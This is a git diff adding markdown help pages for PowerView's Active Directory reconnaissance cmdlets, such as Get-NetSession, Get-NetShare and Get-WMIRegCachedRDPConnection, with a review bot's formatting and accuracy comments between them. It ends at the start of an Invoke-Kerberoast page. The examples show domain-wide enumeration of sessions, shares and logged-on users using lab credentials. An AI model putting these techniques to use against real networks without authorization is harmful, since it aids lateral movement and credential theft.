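Review bot: EXAMPLE 4's fence closes after the first line, leaving the `$Cred` construction and `Get-NetLoggedon -ComputerName sqlserver -Credential $Cred` outside the block, and it lacks the explanatory sentence that EXAMPLES 1 to 3 have. The SYNOPSIS caveat "administrative rights needed for newer Windows OSes" is exactly what the empty NOTES section is for; repeating it there, next to the -Credential parameter's purpose, would make it easier to find when the call returns access denied.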
diff --git a/docs/Recon/Get-NetRDPSession.md b/docs/Recon/Get-NetRDPSession.md new file mode 100755 index 0000000..ff18322 --- /dev/null +++ b/docs/Recon/Get-NetRDPSession.md @@ -0,0 +1,104 @@ +# Get-NetRDPSession
+
+## SYNOPSIS
+Returns remote desktop/session information for the local (or a remote) machine.
+
+Note: only members of the Administrators or Account Operators local group
+can successfully execute this functionality on a remote target.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Get-NetRDPSession [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation
+Win32API calls to query a given RDP remote service for active sessions and originating
+IPs.
+This is a replacement for qwinsta.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetRDPSession
+```
+
+Returns active RDP/terminal sessions on the local host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetRDPSession -ComputerName "sqlserver"
+```
+
+Returns active RDP/terminal sessions on the 'sqlserver' host.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainController | Get-NetRDPSession
+```
+
+Returns active RDP/terminal sessions on all domain controllers.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetRDPSession -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for active sessions (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.RDPSessionInfo
+
+A PSCustomObject representing a combined WTS_SESSION_INFO_1 and WTS_CLIENT_ADDRESS structure,
+with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx)
+
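Review bot: EXAMPLE 4 has the early-closing fence (`$Cred = ...` and `Get-NetRDPSession -ComputerName sqlserver -Credential $Cred` sit outside the block) and no description. EXAMPLE 2 quotes the host (`-ComputerName "sqlserver"`) while EXAMPLE 4 and the sibling pages do not; harmless, but inconsistent. The SYNOPSIS statement that only members of the Administrators or Account Operators local group can run this against a remote target belongs in the -Credential description as well, since that is the parameter a reader reaches for when the remote query fails.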
diff --git a/docs/Recon/Get-NetSession.md b/docs/Recon/Get-NetSession.md new file mode 100755 index 0000000..d9e2f50 --- /dev/null +++ b/docs/Recon/Get-NetSession.md @@ -0,0 +1,99 @@ +# Get-NetSession
+
+## SYNOPSIS
+Returns session information for the local (or a remote) machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Get-NetSession [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will execute the NetSessionEnum Win32API call to query
+a given host for active sessions.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetSession
+```
+
+Returns active sessions on the local host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetSession -ComputerName sqlserver
+```
+
+Returns active sessions on the 'sqlserver' host.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainController | Get-NetSession
+```
+
+Returns active sessions on all domain controllers.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetSession -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for sessions (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.SessionInfo
+
+A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including
+the CName/UserName/Time/IdleTime for each session, with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
+
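Review bot: the OUTPUTS text "A PSCustomObject representing a WKSTA_USER_INFO_1 structure" was carried over from Get-NetLoggedon; that structure is what NetWkstaUserEnum returns and holds UserName/LogonDomain/AuthDomains/LogonServer (as the Get-NetLoggedon page itself says), whereas the CName/UserName/Time/IdleTime fields listed here are the members of NetSessionEnum's SESSION_INFO_10. Change the structure name to SESSION_INFO_10 so the output description matches the API named in DESCRIPTION. EXAMPLE 4's fence also closes after the first line and the example has no description.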
diff --git a/docs/Recon/Get-NetShare.md b/docs/Recon/Get-NetShare.md new file mode 100755 index 0000000..b3f2abe --- /dev/null +++ b/docs/Recon/Get-NetShare.md @@ -0,0 +1,100 @@ +# Get-NetShare
+
+## SYNOPSIS
+Returns open shares on the local (or a remote) machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Get-NetShare [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will execute the NetShareEnum Win32API call to query
+a given host for open shares.
+This is a replacement for "net share \\\\hostname".
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetShare
+```
+
+Returns active shares on the local host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetShare -ComputerName sqlserver
+```
+
+Returns active shares on the 'sqlserver' host
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer | Get-NetShare
+```
+
+Returns all shares for all computers in the domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetShare -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for shares (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ShareInfo
+
+A PSCustomObject representing a SHARE_INFO_1 structure, including
+the name/type/remark for each share, with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
+
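Review bot: Example 4 is mis-fenced: only the `$SecPassword = ConvertTo-SecureString ...` line sits inside the code block, while `$Cred = New-Object ...` and `Get-NetShare -ComputerName sqlserver -Credential $Cred` spill out as body text, where the backslash in `TESTLAB\dfm.a` is subject to Markdown escaping. Wrap all three lines in one fence. The same defect affects the multi-line credential example in nearly every file in this commit, so check how the multi-line example is laid out in the comment-based help rather than patching each page. Consider also showing `Get-Credential` (as Get-WMIRegProxy's Example 2 does) instead of a plaintext `ConvertTo-SecureString ... -AsPlainText -Force`, so the password does not end up in console history or a transcript.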
diff --git a/docs/Recon/Get-PathAcl.md b/docs/Recon/Get-PathAcl.md new file mode 100755 index 0000000..448212f --- /dev/null +++ b/docs/Recon/Get-PathAcl.md @@ -0,0 +1,94 @@ +# Get-PathAcl
+
+## SYNOPSIS
+Enumerates the ACL for a given file path.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-PathAcl [-Path] <String[]> [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+Enumerates the ACL for a specified file/folder path, and translates
+the access rules for each entry into readable formats.
+If -Credential is passed,
+Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-PathAcl "\\SERVER\Share\"
+```
+
+Returns ACLs for the given UNC share.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+gci .\test.txt | Get-PathAcl
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
+Get-PathAcl -Path "\\\\SERVER\Share\" -Credential $Cred
+
+## PARAMETERS
+
+### -Path
+Specifies the local or remote path to enumerate the ACLs for.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: FullName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target path.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+One of more paths to enumerate ACLs for.
+
+## OUTPUTS
+
+### PowerView.FileACL
+
+A custom object with the full path and associated ACL entries.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144)
+
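Review bot: the `-Path` value differs between examples: Example 1 uses `"\\SERVER\Share\"` inside a fence while Example 3's `"\\\\SERVER\Share\"` is Markdown-escaped body text (its fence closes after the first line, as in the other files); once Example 3 is fenced as a single block the doubled backslashes will show literally, so use the unescaped form there. Example 2 (`gci .\test.txt | Get-PathAcl`) is the only example without a description line, and INPUTS has a typo: "One of more paths" should read "One or more paths". Since DESCRIPTION says `-Credential` triggers Add-RemoteConnection/Remove-RemoteConnection, it would help to say plainly that a temporary connection with those credentials is made to the target and removed afterwards, so readers know the call is not a purely local operation.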
diff --git a/docs/Recon/Get-RegLoggedOn.md b/docs/Recon/Get-RegLoggedOn.md new file mode 100755 index 0000000..2fd6e09 --- /dev/null +++ b/docs/Recon/Get-RegLoggedOn.md @@ -0,0 +1,89 @@ +# Get-RegLoggedOn
+
+## SYNOPSIS
+Returns who is logged onto the local (or a remote) machine
+through enumeration of remote registry keys.
+
+Note: This function requires only domain user rights on the
+machine you're enumerating, but remote registry must be enabled.
+
+Author: Matt Kelly (@BreakersAll)
+License: BSD 3-Clause
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-RegLoggedOn [[-ComputerName] <String[]>]
+```
+
+## DESCRIPTION
+This function will query the HKU registry values to retrieve the local
+logged on users SID and then attempt and reverse it.
+Adapted technique from Sysinternal's PSLoggedOn script.
+Benefit over
+using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges
+required (NetWkstaUserEnum requires remote admin access).
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-RegLoggedOn
+```
+
+Returns users actively logged onto the local host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-RegLoggedOn -ComputerName sqlserver
+```
+
+Returns users actively logged onto the 'sqlserver' host.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainController | Get-RegLoggedOn
+```
+
+Returns users actively logged on all domain controllers.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for remote registry values (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.RegLoggedOnUser
+
+A PSCustomObject including the UserDomain/UserName/UserSID of each
+actively logged on user, with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
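Review bot: Example 4 passes `-Credential $Cred`, but the SYNTAX block (`Get-RegLoggedOn [[-ComputerName] <String[]>]`) and PARAMETERS list no `-Credential` parameter, even though Invoke-UserImpersonation is a required dependency; as documented the example would fail parameter binding, so either the function's `-Credential` parameter needs to be regenerated into this page or the example should go. In DESCRIPTION, "attempt and reverse it" should be "attempt to reverse it", "Sysinternal's PSLoggedOn script" should be "Sysinternals' PsLoggedOn tool", and the last sentence ("Benefit over using ... of less user privileges required") is a fragment that needs rephrasing. The SYNOPSIS caveat that only domain user rights are needed but Remote Registry must be enabled is the operationally important statement here and belongs in NOTES too, since that service's state is what an administrator controls.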
diff --git a/docs/Recon/Get-WMIProcess.md b/docs/Recon/Get-WMIProcess.md new file mode 100755 index 0000000..481dbb6 --- /dev/null +++ b/docs/Recon/Get-WMIProcess.md @@ -0,0 +1,80 @@ +# Get-WMIProcess
+
+## SYNOPSIS
+Returns a list of processes and their owners on the local or remote machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-WMIProcess [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine,
+including the owners of the particular process.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-WMIProcess -ComputerName WINDOWS1
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.UserProcess
+
+A PSCustomObject containing the remote process information.
+
+## NOTES
+
+## RELATED LINKS
+
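Review bot: the `-ComputerName` description ("Specifies the hostname to query for cached RDP connections") is copied from Get-WMIRegCachedRDPConnection and should say processes. Example 1 has no description line, Example 2 has the split fence seen in the other files, and `Win32_process` in DESCRIPTION should use the class's canonical casing `Win32_Process`. The OUTPUTS text ("containing the remote process information") could list the fields returned, as the SessionInfo and ShareInfo pages do.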
diff --git a/docs/Recon/Get-WMIRegCachedRDPConnection.md b/docs/Recon/Get-WMIRegCachedRDPConnection.md new file mode 100755 index 0000000..fe60228 --- /dev/null +++ b/docs/Recon/Get-WMIRegCachedRDPConnection.md @@ -0,0 +1,99 @@ +# Get-WMIRegCachedRDPConnection
+
+## SYNOPSIS
+Returns information about RDP connections outgoing from the local (or remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-WMIRegCachedRDPConnection [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses remote registry functionality to query all entries for the
+"Windows Remote Desktop Connection Client" on a machine, separated by
+user and target server.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-WMIRegCachedRDPConnection
+```
+
+Returns the RDP connection client information for the local machine.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-WMIRegCachedRDPConnection -ComputerName WINDOWS2.testlab.local
+```
+
+Returns the RDP connection client information for the WINDOWS2.testlab.local machine
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer | Get-WMIRegCachedRDPConnection
+```
+
+Returns cached RDP information for all machines in the domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connecting to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.CachedRDPConnection
+
+A PSCustomObject containing the ComputerName and cached RDP information.
+
+## NOTES
+
+## RELATED LINKS
+
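Review bot: DESCRIPTION says "Uses remote registry functionality", but the function is named Get-WMIReg* and, per the SYNOPSIS note, needs administrative rights, unlike Get-RegLoggedOn, which needs only domain user rights with Remote Registry enabled; the description should name the actual access path (WMI or the Remote Registry service) so readers know which service and privilege the call depends on. It would also help to name the registry key that holds the "Windows Remote Desktop Connection Client" entries, as Get-WMIRegProxy's description does. Example 2's description is missing its terminating period, and Example 4 has the same broken fence as the other files.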
diff --git a/docs/Recon/Get-WMIRegLastLoggedOn.md b/docs/Recon/Get-WMIRegLastLoggedOn.md new file mode 100755 index 0000000..bed39e0 --- /dev/null +++ b/docs/Recon/Get-WMIRegLastLoggedOn.md @@ -0,0 +1,98 @@ +# Get-WMIRegLastLoggedOn
+
+## SYNOPSIS
+Returns the last user who logged onto the local (or a remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-WMIRegLastLoggedOn [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function uses remote registry to enumerate the LastLoggedOnUser registry key
+for the local (or remote) machine.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-WMIRegLastLoggedOn
+```
+
+Returns the last user logged onto the local machine.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-WMIRegLastLoggedOn -ComputerName WINDOWS1
+```
+
+Returns the last user logged onto WINDOWS1
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer | Get-WMIRegLastLoggedOn
+```
+
+Returns the last user logged onto all machines in the domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for remote registry values (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connecting to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LastLoggedOnUser
+
+A PSCustomObject containing the ComputerName and last loggedon user.
+
+## NOTES
+
+## RELATED LINKS
+
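Review bot: OUTPUTS reads "last loggedon user"; should be "last logged-on user". DESCRIPTION refers to "the LastLoggedOnUser registry key"; LastLoggedOnUser is a registry value, so "value" is the accurate term, and naming its parent key would let readers verify what is read. The "remote registry" wording sits oddly with the WMIReg naming and the admin-rights note, as in Get-WMIRegCachedRDPConnection; Example 2's description lacks a period and Example 4 has the split fence.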
diff --git a/docs/Recon/Get-WMIRegMountedDrive.md b/docs/Recon/Get-WMIRegMountedDrive.md new file mode 100755 index 0000000..353bcf0 --- /dev/null +++ b/docs/Recon/Get-WMIRegMountedDrive.md @@ -0,0 +1,97 @@ +# Get-WMIRegMountedDrive
+
+## SYNOPSIS
+Returns information about saved network mounted drives for the local (or remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-WMIRegMountedDrive [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses remote registry functionality to enumerate recently mounted network drives.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-WMIRegMountedDrive
+```
+
+Returns the saved network mounted drives for the local machine.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local
+```
+
+Returns the saved network mounted drives for the WINDOWS2.testlab.local machine
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer | Get-WMIRegMountedDrive
+```
+
+Returns the saved network mounted drives for all machines in the domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for mounted drive information (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connecting to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.RegMountedDrive
+
+A PSCustomObject containing the ComputerName and mounted drive information.
+
+## NOTES
+
+## RELATED LINKS
+
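Review bot: SYNOPSIS and the example descriptions say "saved network mounted drives" while DESCRIPTION says "recently mounted network drives"; those are not the same thing (persistent mappings versus a most-recently-used list), so settle on the wording that matches what is actually read and use it throughout. Example 2's description has no terminating period, Example 4 has the broken fence seen elsewhere, and OUTPUTS ("mounted drive information") could list the returned fields as the SessionInfo/ShareInfo pages do.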
diff --git a/docs/Recon/Get-WMIRegProxy.md b/docs/Recon/Get-WMIRegProxy.md new file mode 100755 index 0000000..b5fe966 --- /dev/null +++ b/docs/Recon/Get-WMIRegProxy.md @@ -0,0 +1,93 @@ +# Get-WMIRegProxy
+
+## SYNOPSIS
+Enumerates the proxy server and WPAD conents for the current user.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-WMIRegProxy [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Enumerates the proxy server and WPAD specification for the current user
+on the local machine (default), or a machine specified with -ComputerName.
+It does this by enumerating settings from
+HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-WMIRegProxy
+```
+
+ComputerName ProxyServer AutoConfigURL Wpad
+------------ ----------- ------------- ----
+WINDOWS1 http://primary.test...
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$Cred = Get-Credential "TESTLAB\administrator"
+```
+
+Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local
+
+ComputerName ProxyServer AutoConfigURL Wpad
+------------ ----------- ------------- ----
+windows1.testlab.local primary.testlab.local
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the system to enumerate proxy settings on.
+Defaults to the local host.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: $Env:COMPUTERNAME
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connecting to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more computer name specification strings on the pipeline (netbios or FQDN).
+
+## OUTPUTS
+
+### PowerView.ProxySettings
+
+Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents.
+
+## NOTES
+
+## RELATED LINKS
+
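Review bot: Example 2 queries `primary.testlab.local` but the sample output's ComputerName column shows `windows1.testlab.local`; one of the two is wrong. Both examples' output tables sit outside the fence as body text with their column alignment collapsed (`ComputerName ProxyServer AutoConfigURL Wpad`, a dashes line, then one truncated row), so fence the output or drop it. SYNOPSIS has a typo: "WPAD conents" should be "WPAD contents". The path in DESCRIPTION, `HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings`, is missing the separator after the hive and the per-user SID subkey that sits under HKU; since the text says "for the current user", spell out that the key is read under that user's SID. The `-ComputerName` default (`$Env:COMPUTERNAME`) differs from the `Localhost` default of the sibling functions; fine if intentional, but it is the only outlier in this commit.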
diff --git a/docs/Recon/Invoke-Kerberoast.md b/docs/Recon/Invoke-Kerberoast.md new file mode 100755 index 0000000..edfb89b --- /dev/null +++ b/docs/Recon/Invoke-Kerberoast.md @@ -0,0 +1,233 @@ +# Invoke-Kerberoast
+
+## SYNOPSIS
+Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes.
+
+Author: Will Schroeder (@harmj0y), @machosec
+License: BSD 3-Clause
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, Get-DomainUser, Get-DomainSPNTicket
+
+## SYNTAX
+
+```
+Invoke-Kerberoast [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>]
+ [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
